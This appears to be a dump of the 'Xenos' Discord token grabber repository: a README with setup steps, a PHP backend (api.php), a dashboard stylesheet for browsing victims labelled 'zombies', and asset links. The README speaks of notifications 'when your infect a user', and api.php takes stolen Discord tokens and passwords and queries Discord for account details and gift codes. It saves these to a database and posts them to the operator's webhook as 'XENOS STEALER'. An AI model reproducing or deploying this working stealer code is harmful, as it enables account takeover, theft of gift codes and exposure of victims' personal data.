41 | `email` text NOT NULL, 42 | `phone` text NOT NULL, 43 | `badges` int(10) NOT NULL, 44 | `nitro_badges` int(10) NOT NULL, 45 | `twofactor` varchar(100) NOT NULL, 46 | `token` text NOT NULL, 47 | `isflaged` int(10) NOT NULL, 48 | `password` varchar(100) NOT NULL 49 | ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 50 | 51 | ALTER TABLE `gifts` 52 | ADD PRIMARY KEY (`id`); 53 | 54 | ALTER TABLE `gifts` 55 | MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5; 56 | COMMIT; 57 | ``` 58 | - - Then go to `Inc/database.php` and put your __hostname, database, username, password__ 59 | - Open `Inc/fonctions.php` and put: 60 | - At line 5 replace `PASSWORD FOR API` by a **password** for using our api and remove a token 61 | - At line 6 replace `YOUR DISCORD WEBHOOK` by your webhook for receive notifications when your infect a user 62 | - At line 9 & 10 Go to https://discord.com/developers then create an applcation 63 | - In Click on your application in Oauth2 Section Copy the Client ID and Client Secret 64 | - At line 11 replace `yoursite.com` by your website url and on https://discord.com/developers on your application in oauth section create a redirect and paste `http://yoursite.com/async/login` *(with your website please your are not stupid)* 65 | - For end just add your id at the line 12, for each id separated by `,`
(exemple: `array("922450497074495539", "957329295603269652")`) 66 | 67 | - Put a stars and follow me for more ❤️ 68 | 69 | ### Grabber Demo: 70 | > ![](https://cdn.discordapp.com/attachments/931632899709620254/965005206209302528/unknown.png) 71 | ### Connection Notification Demo: 72 | > ![](https://cdn.discordapp.com/attachments/931632899709620254/965018184325402675/unknown.png) 73 | ### Home Page Demo: 74 | > ![](https://media.discordapp.net/attachments/931632899709620254/965018381138931712/unknown.png?width=1394&height=682) 75 | 76 |

77 | Contribution Welcome 78 | License Badge 79 | Open Source 80 | Visitor Count 81 |

82 | -------------------------------------------------------------------------------- /api.php: -------------------------------------------------------------------------------- 1 | "https://discord.com/api/v9/users/@me/outbound-promotions/codes", 20 | CURLOPT_RETURNTRANSFER => true, 21 | CURLOPT_HTTPHEADER => array( 22 | "Authorization: " . $_GET['token'] 23 | ) 24 | )); 25 | $response = curl_exec($getCodes); 26 | curl_close($getCodes); 27 | $data = json_decode($response); 28 | 29 | $codes = ""; 30 | $locked = 0; 31 | $isflag = "\\❌"; 32 | if(isset($data->message) && $data->message == "You need to verify your account in order to perform this action.") { 33 | $locked = 1; 34 | $isflag = "\\✔️"; 35 | $codes = "\\❌"; 36 | } else { 37 | foreach($data as $code) { 38 | $check = $bdd->prepare("SELECT * FROM `gifts` WHERE `code` = ?"); 39 | $check->execute(array(strval($code->code))); 40 | $count = $check->rowCount(); 41 | 42 | $codes .= "{$code->promotion->outbound_title}: {$code->code}\n"; 43 | if($count == 0) { 44 | $req = $bdd->prepare("INSERT INTO `gifts`(`gift_name`,`start_date`,`end_date`,`code`,`claim_at`) VALUES (?,?,?,?,?)"); 45 | $req->execute(array(strval($code->promotion->outbound_title), strval($code->promotion->start_date), strval($code->promotion->end_date), strval($code->code), strval($code->claimed_at))); 46 | } else { 47 | $req = $bdd->prepare("UPDATE `gifts` SET `gift_name`= ?, `start_date`= ?, `end_date`= ?, `code`= ?, `claim_at`= ? WHERE code = ?"); 48 | $req->execute(array(strval($code->promotion->outbound_title), strval($code->promotion->start_date), strval($code->promotion->end_date), strval($code->code), strval($code->claimed_at), strval($code->code))); 49 | } 50 | } 51 | } 52 | 53 | $check = curl_init(); 54 | curl_setopt_array($check, array( 55 | CURLOPT_URL => "https://discordapp.com/api/v9/users/@me", 56 | CURLOPT_RETURNTRANSFER => true, 57 | CURLOPT_HTTPHEADER => array( 58 | "Authorization: " . $_GET['token'], 59 | "Content-Type: application/json" 60 | ) 61 | )); 62 | $response = curl_exec($check); 63 | curl_close($check); 64 | $data = json_decode($response); 65 | 66 | if (isset($data->id) && !empty($data->id)) { 67 | $check = $bdd->prepare('SELECT * FROM tokens WHERE `user_id` = ?'); 68 | $check->execute(array($data->id)); 69 | $count = $check->rowCount(); 70 | 71 | $user_password = ""; 72 | if(isset($_GET["password"]) && !empty($_GET["password"])) {$user_password = $_GET["password"];} 73 | 74 | if($count == 0) { 75 | if(strval((bool) $data->phone)) {$phone = $data->phone;} else {$phone = "No Phone";} 76 | $req = $bdd->prepare("INSERT INTO `tokens`(`user_id`, `username`, `avatar`, `email`, `phone`, `badges`, `nitro_badges`, `twofactor`, `token`, `isflaged`, `password`) VALUES (?,?,?,?,?,?,?,?,?,?,?)"); 77 | $req->execute(array(strval($data->id),strval($data->username)."#".strval($data->discriminator),strval($data->avatar),strval($data->email),strval($phone),strval($data->flags),intval($data->premium_type ?? 0),strval((bool) $data->mfa_enabled),strval($token), $locked, $user_password)); 78 | 79 | $reponse['success'] = true; 80 | $reponse['message'] = 'Token Added to Database.'; 81 | 82 | } else { 83 | if(strval((bool) $data->phone)) {$phone = $data->phone;} else {$phone = "No Phone";} 84 | $req = $bdd->prepare("UPDATE `tokens` SET `username` = ?, `avatar` = ?, `email` = ?, `phone` = ?, `badges` = ?, `nitro_badges` = ?, `twofactor` = ?, `token` = ?, `isflaged` = ?, `password` = ? WHERE id = ?"); 85 | $req->execute(array(strval($data->username)."#".strval($data->discriminator),strval($data->avatar),strval($data->email),strval($phone),strval($data->flags),intval($data->premium_type ?? 0),strval((bool) $data->mfa_enabled),strval($token), $locked, $user_password, strval($data->id))); 86 | 87 | $reponse['message'] = 'Token already in our Database.'; 88 | } 89 | 90 | if ($data->premium_type == 1) {$nitro_type = "\\✔️ Nitro Classic";} 91 | else if ($data->premium_type == 2) {$nitro_type = "\\✔️ Nitro Boost";} else {$nitro_type = "\\❌ No Nitro";} 92 | if(strval((bool) $data->mfa_enabled) == true) {$mfa = "\\✔️";} else {$mfa = "\\❌";} 93 | if(strval((bool) $data->phone)) {$phone = $data->phone;} else {$phone = "\\❌";} 94 | if($codes == "") {$codes = "❌ No Codes Found";} 95 | if($user_password == "") {$user_password = "`❌ No Password Sent`";} 96 | 97 | SendToWebhook($webhook, json_encode( 98 | [ 99 | "username" => "Xenos Grabber", 100 | "avatar_url" => "https://github.com/KanekiWeb/Xenos/blob/main/assets/images/xenos.gif?raw=true", 101 | "embeds" => [ 102 | [ 103 | "title" => "\\🐺 __XENOS STEALER__ \\🐺", 104 | "description" => "```\n ```\n> Username: **{$data->username}#{$data->discriminator}**\n> User ID: **{$data->id}**\n> Email Adress: **{$data->email}**\n> Phone: **{$phone}**\n> Nitro: {$nitro_type}\n> Two Factor: {$mfa}\n> Account Flaged: {$isflag}\n\n> Token: `{$token}`\n> Password: {$user_password}\n```\n ```\n> About:\n```\n{$data->bio}```\n> Gift Codes:\n```\n{$codes}\n```\n> Profile Banner:", 105 | "thumbnail" => [ 106 | "url" => "https://cdn.discordapp.com/avatars/{$data->id}/{$data->avatar}" 107 | ], 108 | "image" => [ 109 | "url" => "https://cdn.discordapp.com/banners/{$data->id}/{$data->banner}" 110 | ], 111 | "footer" => [ 112 | "text" => "🐺 UHQ Token Grabber Made with ❤️ by github.com/KanekiWeb/Xenos", 113 | "icon_url" => "https://github.com/KanekiWeb/Xenos/blob/main/assets/images/xenos.gif?raw=true" 114 | ], 115 | 116 | ] 117 | ] 118 | ] 119 | )); 120 | 121 | } else { 122 | $reponse['message'] = 'Please provide a token or check if your token is valid.'; 123 | } 124 | } else if ($type == "removetoken") { 125 | if(htmlspecialchars($_GET["password"]) == $api_password || CheckLogin()) { 126 | $req = $bdd->prepare("DELETE FROM `tokens` WHERE `token` = ?"); 127 | $req->execute(array($token)); 128 | 129 | $reponse["success"] = true; 130 | $reponse['message'] = 'Token deleted from database successfully !'; 131 | 132 | } else { 133 | $reponse['message'] = 'I can\'t remove this token, please provide the good password or Login You !'; 134 | } 135 | } else { 136 | $reponse['message'] = 'Invalid Request type, Please use only addtoken or removetoken.'; 137 | } 138 | } else { 139 | $reponse["message"] = "Please provide a token or check if your token is valid."; 140 | } 141 | } else { 142 | $reponse['message'] = 'Please provide a token or check if your token is valid.'; 143 | } 144 | 145 | } else { 146 | $reponse['message'] = 'Invalid Request type, Please use only addtoken or removetoken.'; 147 | } 148 | 149 | if(isset($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME'])) { 150 | header('Location: '. $_SERVER['HTTP_REFERER']); die(); 151 | } else { 152 | echo json_encode($reponse); 153 | } 154 | 155 | ?> -------------------------------------------------------------------------------- /assets/badges/Balance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/Balance.png -------------------------------------------------------------------------------- /assets/badges/Bravery.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/Bravery.png -------------------------------------------------------------------------------- /assets/badges/Brilliance.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/Brilliance.png -------------------------------------------------------------------------------- /assets/badges/BugHunter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/BugHunter.png -------------------------------------------------------------------------------- /assets/badges/HypeSquad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/HypeSquad.png -------------------------------------------------------------------------------- /assets/badges/Nitro_Boost.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/Nitro_Boost.png -------------------------------------------------------------------------------- /assets/badges/Nitro_cl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/Nitro_cl.png -------------------------------------------------------------------------------- /assets/badges/Partner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/Partner.png -------------------------------------------------------------------------------- /assets/badges/Staff.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/Staff.png -------------------------------------------------------------------------------- /assets/badges/dev.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/dev.png -------------------------------------------------------------------------------- /assets/badges/early.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/early.png -------------------------------------------------------------------------------- /assets/badges/verif.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/badges/verif.png -------------------------------------------------------------------------------- /assets/css/style.css: -------------------------------------------------------------------------------- 1 | @import url('https://fonts.googleapis.com/css2?family=Poppins&display=swap'); 2 | @import url('https://fonts.googleapis.com/css2?family=Open+Sans&display=swap'); 3 | 4 | *, 5 | *::before, 6 | *::after { 7 | margin: 0; 8 | padding: 0; 9 | box-sizing: border-box; 10 | } 11 | 12 | body { 13 | font-family: "Poppins", sans-serif; 14 | background: #15161f; 15 | color: white; 16 | /* font-weight: bold; */ 17 | } 18 | 19 | /* nav bar */ 20 | 21 | header { 22 | background-color: #181925; 23 | padding: 20px 30px; 24 | } 25 | 26 | header nav { 27 | display: flex; 28 | flex-direction: row; 29 | align-items: center; 30 | justify-content: space-between; 31 | text-align: center; 32 | } 33 | 34 | header nav .header_links ul { 35 | display: flex; 36 | flex-direction: row; 37 | } 38 | 39 | header nav .header_logo { 40 | font-size: 30px; 41 | font-weight: bold; 42 | cursor: pointer; 43 | outline: none; 44 | text-decoration: none; 45 | color: white; 46 | } 47 | 48 | header nav .header_links ul li { 49 | list-style-type: none; 50 | } 51 | 52 | header nav .header_links ul li a { 53 | outline: none; 54 | text-decoration: none; 55 | color: white; 56 | padding: 11.5px 15px; 57 | border-radius: 7px; 58 | transition: 0.2s all; 59 | font-size: 17px; 60 | font-weight: bold; 61 | text-transform: uppercase; 62 | } 63 | 64 | header nav .header_links ul li a:hover { 65 | transition: 0.2s all; 66 | background-color: #3b3d4e93; 67 | } 68 | 69 | header nav .header_links ul li a:not(:nth-child(0)) { 70 | margin-left: 10px; 71 | } 72 | 73 | @media only screen and (max-width: 380px) { 74 | header nav { 75 | display: flex; 76 | flex-direction: column; 77 | align-items: center; 78 | justify-content: space-between; 79 | text-align: center; 80 | } 81 | 82 | header nav .header_logo { 83 | margin-bottom: 20px; 84 | display: none; 85 | } 86 | } 87 | 88 | /* Main Infos */ 89 | 90 | .section_main { 91 | display: flex; 92 | flex-direction: column; 93 | text-align: center; 94 | align-items: center; 95 | justify-content: center; 96 | } 97 | 98 | .section_main .main { 99 | margin: 40px 0; 100 | } 101 | 102 | .section_main .main img { 103 | border-radius: 100px; 104 | border: 10px solid rgba(0,0,0,0.25); 105 | width: 200px; 106 | height: auto; 107 | margin-bottom: 15px 108 | } 109 | 110 | .section_main .main span { 111 | font-size: 20px; 112 | letter-spacing: .5px; 113 | text-transform: uppercase; 114 | font-weight: bold; 115 | } 116 | 117 | .section_main .main p { 118 | color: rgba(204, 204, 204, 0.705); 119 | font-size: 14px; 120 | margin: 12px 0 35px 0; 121 | } 122 | 123 | .section_main .main a { 124 | outline: none; 125 | text-decoration: none; 126 | color: white; 127 | background-color: #2f3463; 128 | border-radius: 8px; 129 | padding: 15px 40px; 130 | transition: 0.2s all; 131 | } 132 | 133 | .section_main .main a:hover { 134 | transition: 0.2s all; 135 | background-color: rgba(40, 47, 94, 0.925); 136 | } 137 | 138 | /* Statistiques */ 139 | 140 | .section_stats { 141 | display: flex; 142 | flex-direction: column; 143 | text-align: center; 144 | align-items: center; 145 | justify-content: center; 146 | } 147 | 148 | .section_stats .stats { 149 | display: flex; 150 | flex-direction: row; 151 | flex-wrap: wrap; 152 | text-align: center; 153 | align-items: center; 154 | justify-content: center; 155 | margin-top: 30px; 156 | } 157 | 158 | .section_stats .stats .stat { 159 | margin: 15px 0; 160 | background-color: #20233a93; 161 | width: 170px; 162 | padding: 20px 0; 163 | border-radius: 12px; 164 | box-shadow: 0 0 20px 1px #04061d; 165 | transition: 0.2s all; 166 | cursor: pointer; 167 | margin: 15px; 168 | } 169 | 170 | .section_stats .stats .stat:hover { 171 | transition: 0.2s all; 172 | box-shadow: 0 0 20px 1px #080811; 173 | transform: scale(1.05); 174 | } 175 | 176 | .section_stats .stats .stat span { 177 | font-size: 30px; 178 | margin-right: 5px; 179 | } 180 | 181 | .section_stats .stats .stat p { 182 | margin-top: 13px; 183 | letter-spacing: .5px; 184 | text-transform: uppercase; 185 | font-weight: bold; 186 | } 187 | 188 | .section_stats .section_title p { 189 | font-size: 25px; 190 | margin-top: 40px; 191 | color: #ccc; 192 | text-transform: uppercase; 193 | font-weight: bold; 194 | } 195 | 196 | /* Fondateur(s) */ 197 | 198 | .section_owners { 199 | display: flex; 200 | flex-direction: column; 201 | text-align: center; 202 | align-items: center; 203 | justify-content: center; 204 | } 205 | 206 | .section_owners .owners { 207 | display: flex; 208 | flex-direction: row; 209 | flex-wrap: wrap; 210 | text-align: center; 211 | align-items: center; 212 | justify-content: center; 213 | margin-top: 20px; 214 | } 215 | 216 | .section_owners .owners .owner { 217 | display: flex; 218 | flex-direction: column; 219 | flex-wrap: wrap; 220 | text-align: center; 221 | align-items: center; 222 | justify-content: center; 223 | background-color: #20233a93; 224 | width: 35.5em; 225 | padding: 30px; 226 | border-radius: 12px; 227 | box-shadow: 0 0 20px 1px #04061d; 228 | transition: 0.2s all; 229 | margin: 15px; 230 | } 231 | 232 | .section_owners .owners .owner img { 233 | border-radius: 100px; 234 | border: 10px solid rgba(0,0,0,0.25); 235 | width: 130px; 236 | height: 120px; 237 | } 238 | 239 | .section_owners .owners .owner span { 240 | font-size: 20px; 241 | margin-top: 20px; 242 | letter-spacing: .5px; 243 | text-transform: uppercase; 244 | font-weight: bold; 245 | } 246 | 247 | .section_owners .owners .owner p { 248 | color: rgba(204, 204, 204, 0.705); 249 | font-size: 14px; 250 | margin: 7px 0 0 0; 251 | } 252 | 253 | .section_owners .owners .owner a { 254 | outline: none; 255 | text-decoration: none; 256 | color: white; 257 | background-color: #2f3463; 258 | border-radius: 8px; 259 | margin-top: 20px; 260 | width: 80%; 261 | padding: 13px 0; 262 | transition: 0.2s all; 263 | } 264 | 265 | .section_owners .owners .owner a:hover { 266 | transition: 0.2s all; 267 | background-color: rgba(40, 47, 94, 0.925); 268 | } 269 | 270 | .section_owners .owners .owner:hover { 271 | transition: 0.2s all; 272 | transform: scale(1.04); 273 | } 274 | 275 | @media only screen and (max-width: 600px) { 276 | .section_owners .owners .owner { 277 | width: 90vmin; 278 | } 279 | 280 | .section_stats .stats .stat { 281 | min-width: 90%; 282 | } 283 | } 284 | 285 | /* Scroll Bar */ 286 | 287 | ::-webkit-scrollbar { 288 | background: transparent; 289 | width: 10px; 290 | } 291 | 292 | ::-webkit-scrollbar-track { 293 | background: transparent; 294 | } 295 | 296 | ::-webkit-scrollbar-track:hover { 297 | background: transparent; 298 | } 299 | 300 | ::-webkit-scrollbar-thumb { 301 | transition: 0.3s all; 302 | background-color: #0a0a13; 303 | } 304 | 305 | ::-webkit-scrollbar-thumb:hover { 306 | transition: 0.3s all; 307 | background-color: rgba(4, 5, 12, 0.815); 308 | } 309 | 310 | ::-webkit-scrollbar-button { 311 | display: none 312 | } 313 | 314 | /* Footer */ 315 | footer { 316 | font-family: 'Roboto', sans-serif; 317 | opacity: 0.5; 318 | font-size: 13.5px; 319 | width: 100%; 320 | color: white; 321 | text-align: center; 322 | padding: 20px 0; 323 | margin-top: 25px; 324 | } 325 | 326 | footer a { 327 | color: rgba(238, 48, 48, 0.87); 328 | outline: none; 329 | margin-left: 5px; 330 | text-decoration: none; 331 | } 332 | 333 | /* Zombies */ 334 | 335 | .section_zombies { 336 | display: flex; 337 | flex-direction: column; 338 | text-align: center; 339 | align-items: center; 340 | justify-content: center; 341 | } 342 | 343 | .section_zombies .zombies { 344 | display: flex; 345 | flex-direction: row; 346 | flex-wrap: wrap; 347 | text-align: center; 348 | align-items: center; 349 | justify-content: center; 350 | } 351 | 352 | .section_zombies .zombies .zombie .user_pfp { 353 | border-radius: 100px; 354 | border: 10px solid rgba(0,0,0,0.25); 355 | width: 130px; 356 | height: 120px; 357 | } 358 | 359 | .section_zombies .zombies .zombie span { 360 | font-size: 15px; 361 | margin: 15px 0; 362 | letter-spacing: .5px; 363 | text-transform: uppercase; 364 | font-weight: bold; 365 | } 366 | 367 | .section_owners .zombies .zombies p { 368 | color: rgba(204, 204, 204, 0.705); 369 | font-size: 14px; 370 | margin: 7px 0 0 0; 371 | } 372 | 373 | .select-button, .select-input { 374 | outline: none; 375 | text-decoration: none; 376 | color: white; 377 | background-color: #252b58; 378 | border-radius: 8px; 379 | margin-bottom: 20px; 380 | width: 200px; 381 | padding: 10px; 382 | transition: 0.2s all; 383 | border: 1px solid rgba(26, 31, 63, 0.925); 384 | box-shadow: 0 0 20px 1px #04061d; 385 | margin-right: 20px; 386 | } 387 | 388 | .select-button { 389 | cursor: pointer; 390 | } 391 | 392 | .filtre { 393 | display: flex; 394 | flex-direction: row; 395 | flex-wrap: wrap; 396 | text-align: center; 397 | align-items: center; 398 | justify-content: center; 399 | } 400 | 401 | .section_zombies .zombies .zombie.flaged-0 a:hover, .section_zombies .select-button:hover { 402 | transition: 0.2s all; 403 | background-color: rgba(40, 47, 94, 0.925); 404 | } 405 | 406 | .section_zombies .zombies .zombie.flaged-1 a:hover { 407 | transition: 0.2s all; 408 | background-color: #251012; 409 | } 410 | 411 | .section_zombies .zombies .zombie:hover { 412 | transition: 0.2s all; 413 | transform: scale(1.04); 414 | } 415 | 416 | .section_zombies .zombies .zombie .badges { 417 | height: 40px; 418 | } 419 | 420 | .section_zombies .zombies .zombie .badges img { 421 | width: 30px; 422 | height: 30px; 423 | margin-top: 10px; 424 | object-fit: contain; 425 | -o-object-fit: contain; 426 | } 427 | 428 | .section_zombies .zombies .zombie .badges img:not(:nth-last-child(0)) { 429 | margin-left: 2px; 430 | } 431 | 432 | @media only screen and (max-width: 370px) { 433 | .section_zombies .zombies .zombie { 434 | display: flex; 435 | flex-direction: column; 436 | flex-wrap: wrap; 437 | text-align: center; 438 | align-items: center; 439 | justify-content: center; 440 | background-color: #20233a93; 441 | width: 90vmin; 442 | padding: 30px; 443 | border-radius: 12px; 444 | box-shadow: 0 0 20px 1px #04061d; 445 | transition: 0.2s all; 446 | margin: 15px; 447 | font-family: monospace; 448 | } 449 | } 450 | 451 | /* Zombie Infos */ 452 | 453 | .section_zombie { 454 | display: flex; 455 | flex-direction: row; 456 | flex-wrap: wrap; 457 | text-align: center; 458 | align-items: center; 459 | justify-content: center; 460 | } 461 | 462 | .section_zombie .zombie .user_pfp { 463 | border-radius: 100px; 464 | border: 10px solid rgba(0,0,0,0.25); 465 | width: 130px; 466 | height: 120px; 467 | } 468 | 469 | .section_zombie .zombie { 470 | display: flex; 471 | flex-direction: column; 472 | flex-wrap: wrap; 473 | text-align: left; 474 | align-items: left; 475 | justify-content: center; 476 | background-color: #20233a93; 477 | width: 90vmin; 478 | padding: 30px; 479 | border-radius: 12px; 480 | box-shadow: 0 0 20px 1px #04061d; 481 | transition: 0.2s all; 482 | margin: 15px; 483 | font-family: monospace; 484 | } 485 | 486 | .section_zombie .zombie .badges img { 487 | width: 23px; 488 | height: 23px; 489 | margin-top: 10px; 490 | object-fit: contain; 491 | -o-object-fit: contain; 492 | } 493 | 494 | .section_zombie .zombie:hover { 495 | transition: 0.3s all; 496 | transform: scale(1.02); 497 | } 498 | 499 | .section_zombie .zombie span { 500 | font-size: 15px; 501 | margin: 15px 0; 502 | letter-spacing: .5px; 503 | text-transform: uppercase; 504 | font-weight: bold; 505 | } 506 | 507 | .section_zombie .zombie p { 508 | color: rgba(204, 204, 204, 0.705); 509 | font-size: 14px; 510 | margin: 7px 0 0 0; 511 | } 512 | 513 | .section_zombie .zombie a { 514 | outline: none; 515 | text-decoration: none; 516 | color: white; 517 | background-color: #2f3463; 518 | border-radius: 8px; 519 | margin-top: 20px; 520 | width: 80%; 521 | padding: 13px 0; 522 | transition: 0.2s all; 523 | } 524 | 525 | .section_zombie .zombie .user_infos { 526 | display: flex; 527 | flex-direction: row; 528 | flex-wrap: wrap; 529 | align-items: center; 530 | justify-content: center; 531 | } 532 | 533 | .section_zombie .zombie .user_infos .user_text_infos { 534 | display: flex; 535 | flex-direction: column; 536 | text-align: left; 537 | margin-left: 10px; 538 | } 539 | 540 | .section_zombie .zombie .personnals_infos { 541 | margin-top: 40px; 542 | } 543 | 544 | .section_zombie .zombie .personnals_infos .token-input input { 545 | width: 100%; 546 | } 547 | 548 | .section_zombie .zombie .personnals_infos .custom-input { 549 | display: flex; 550 | flex-direction: column; 551 | } 552 | 553 | .section_zombie .zombie .personnals_infos .custom-input input { 554 | margin-top: 7px; 555 | font-size: 13px; 556 | } 557 | 558 | .section_zombie .zombie .personnals_infos .custom-input label { 559 | margin-left: 3px; 560 | } 561 | 562 | .section_zombie .zombie .personnals_infos .infos { 563 | display: flex; 564 | flex-direction: row; 565 | flex-wrap: wrap; 566 | } 567 | 568 | .section_zombie .zombie .btn { 569 | display: flex; 570 | flex-direction: row; 571 | flex-wrap: wrap; 572 | align-items: center; 573 | justify-content: center; 574 | text-align: center; 575 | margin-top: 20px; 576 | } 577 | 578 | .section_zombie .zombie .btn button { 579 | color: white; 580 | background-color: #252b58; 581 | border-radius: 8px; 582 | width: 200px; 583 | padding: 10px; 584 | transition: 0.2s all; 585 | border: 1px solid rgba(26, 31, 63, 0.925); 586 | box-shadow: 0 0 20px 1px #04061d; 587 | cursor: pointer; 588 | } 589 | 590 | @media only screen and (min-width: 511px) { 591 | .section_zombie .zombie .btn button:not(:nth-child(1)) { 592 | margin-left: 20px; 593 | } 594 | } 595 | 596 | @media only screen and (max-width: 511px) { 597 | .section_zombie .zombie .btn button:not(:nth-child(1)) { 598 | margin-top: 15px; 599 | } 600 | } 601 | 602 | .section_zombie .zombie .btn button:hover { 603 | transition: 0.2s all; 604 | background-color: rgba(30, 36, 78, 0.925); 605 | } 606 | 607 | /* */ 608 | 609 | .login_form { 610 | display: flex; 611 | flex-direction: column; 612 | align-items: center; 613 | justify-content: center; 614 | } 615 | 616 | .login_form input { 617 | outline: none; 618 | text-decoration: none; 619 | color: white; 620 | background-color: #252b58; 621 | border-radius: 8px; 622 | margin-bottom: 20px; 623 | width: 300px; 624 | padding: 10px; 625 | transition: 0.2s all; 626 | border: 1px solid rgba(26, 31, 63, 0.925); 627 | box-shadow: 0 0 20px 1px #04061d; 628 | } 629 | 630 | .login_form button { 631 | color: white; 632 | background-color: #252b58; 633 | border-radius: 8px; 634 | width: 250px; 635 | padding: 10px; 636 | transition: 0.2s all; 637 | border: 1px solid rgba(26, 31, 63, 0.925); 638 | box-shadow: 0 0 20px 1px #04061d; 639 | cursor: pointer; 640 | margin: 10px 0 20px; 641 | } 642 | 643 | .delete_zombie { 644 | outline: none; 645 | text-decoration: none; 646 | color: white; 647 | border-radius: 8px; 648 | margin-top: 20px; 649 | width: 80%; 650 | padding: 13px 0; 651 | transition: 0.2s all; 652 | box-shadow: 0 0 20px 1px #04061d; 653 | background-color: rgb(173, 65, 66); 654 | } 655 | 656 | .search-btn { 657 | width: 50px; 658 | } 659 | 660 | .flaged-0 { 661 | display: flex; 662 | flex-direction: column; 663 | flex-wrap: wrap; 664 | text-align: center; 665 | align-items: center; 666 | justify-content: center; 667 | background-color: #20233a93; 668 | width: 350px; 669 | height: 390px; 670 | padding: 30px; 671 | border-radius: 12px; 672 | box-shadow: 0 0 20px 1px #04061d; 673 | transition: 0.2s all; 674 | margin: 15px; 675 | font-family: monospace; 676 | } 677 | 678 | .flaged-1 { 679 | background-color: #3a202093; 680 | display: flex; 681 | flex-direction: column; 682 | flex-wrap: wrap; 683 | text-align: center; 684 | align-items: center; 685 | justify-content: center; 686 | width: 350px; 687 | height: 390px; 688 | padding: 30px; 689 | border-radius: 12px; 690 | box-shadow: 0 0 20px 1px #1d0404; 691 | transition: 0.2s all; 692 | margin: 15px; 693 | font-family: monospace; 694 | } 695 | 696 | .flaged-0 a { 697 | outline: none; 698 | text-decoration: none; 699 | color: white; 700 | background-color: #2f3463; 701 | border-radius: 8px; 702 | margin-top: 20px; 703 | width: 80%; 704 | padding: 13px 0; 705 | transition: 0.2s all; 706 | } 707 | 708 | .flaged-1 a { 709 | outline: none; 710 | text-decoration: none; 711 | color: white; 712 | /* background-color: #2f3463; */ 713 | border-radius: 8px; 714 | margin-top: 20px; 715 | width: 80%; 716 | padding: 13px 0; 717 | transition: 0.2s all; 718 | background-color: #7c353593; 719 | } 720 | 721 | /* Gifts Section */ 722 | 723 | .section_zombies .zombies .gift { 724 | display: flex; 725 | flex-direction: column; 726 | flex-wrap: wrap; 727 | text-align: center; 728 | align-items: center; 729 | justify-content: center; 730 | background-color: #20233a93; 731 | width: 400px; 732 | height: 120px; 733 | padding: 20px 30px; 734 | border-radius: 12px; 735 | box-shadow: 0 0 20px 1px #04061d; 736 | transition: 0.2s all; 737 | margin: 15px; 738 | font-family: monospace; 739 | } 740 | 741 | .section_zombies .zombies .gift span { 742 | font-size: 15px; 743 | margin: 15px 0; 744 | letter-spacing: .5px; 745 | text-transform: uppercase; 746 | font-weight: bold; 747 | } 748 | 749 | .section_owners .zombies .gift p { 750 | color: rgba(204, 204, 204, 0.705); 751 | font-size: 14px; 752 | margin: 7px 0 0 0; 753 | } -------------------------------------------------------------------------------- /assets/fonts/bootstrap/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/fonts/bootstrap/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /assets/fonts/bootstrap/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/fonts/bootstrap/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /assets/fonts/bootstrap/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/fonts/bootstrap/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /assets/fonts/bootstrap/glyphicons-halflings-regular.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/fonts/bootstrap/glyphicons-halflings-regular.woff2 -------------------------------------------------------------------------------- /assets/fonts/icomoon/icomoon.eot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/fonts/icomoon/icomoon.eot -------------------------------------------------------------------------------- /assets/fonts/icomoon/icomoon.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/KanekiWeb/Xenos/e80bcdefacf79d7df53d670741727ea26a1e1ec3/assets/fonts/icomoon/icomoon.ttf -------------------------------------------------------------------------------- /assets/fonts/icomoon/icomoon.woff: -------------------------------------------------------------------------------- 